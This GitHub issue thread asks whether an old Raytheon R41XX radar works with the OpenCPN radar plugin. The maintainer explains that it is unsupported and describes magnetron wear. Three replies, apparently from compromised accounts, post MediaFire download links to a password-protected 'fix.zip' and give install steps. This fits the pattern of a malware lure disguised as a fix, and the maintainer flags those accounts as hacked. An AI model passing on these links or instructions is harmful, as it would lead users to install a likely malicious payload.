opencpn-radar-pi/radar_pi #271: R41XX raster scan radar

cpelon, 2024-08-27:
I have a circa 1996 Raytheon R41XX radar that is operating great on my boat. Any chance this radar would work with Radar PI and OpenCPN?

Gaurav9812, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

ViniciusSCG, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

keesverruijt, 2024-08-28:
I think some Github users have been hacked, I will contact them and remove the replies.

keesverruijt, 2024-08-28:
Nope, see https://www.cruisersforum.com/forums/f13/raster-scan-radar-142134.html (a discussion from 9 years ago, and the radar was considered old then!)

If it's still working you ain't using it much, as the magnetron _will_ die when it reaches 3000-5000 hours of operation. Well, it doesn't die, but the gap gets bigger and this means the frequency changes too much so the receiver doesn't receive it anymore.

closed 2024-08-28 by keesverruijt

LC-JiaZhaorong, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."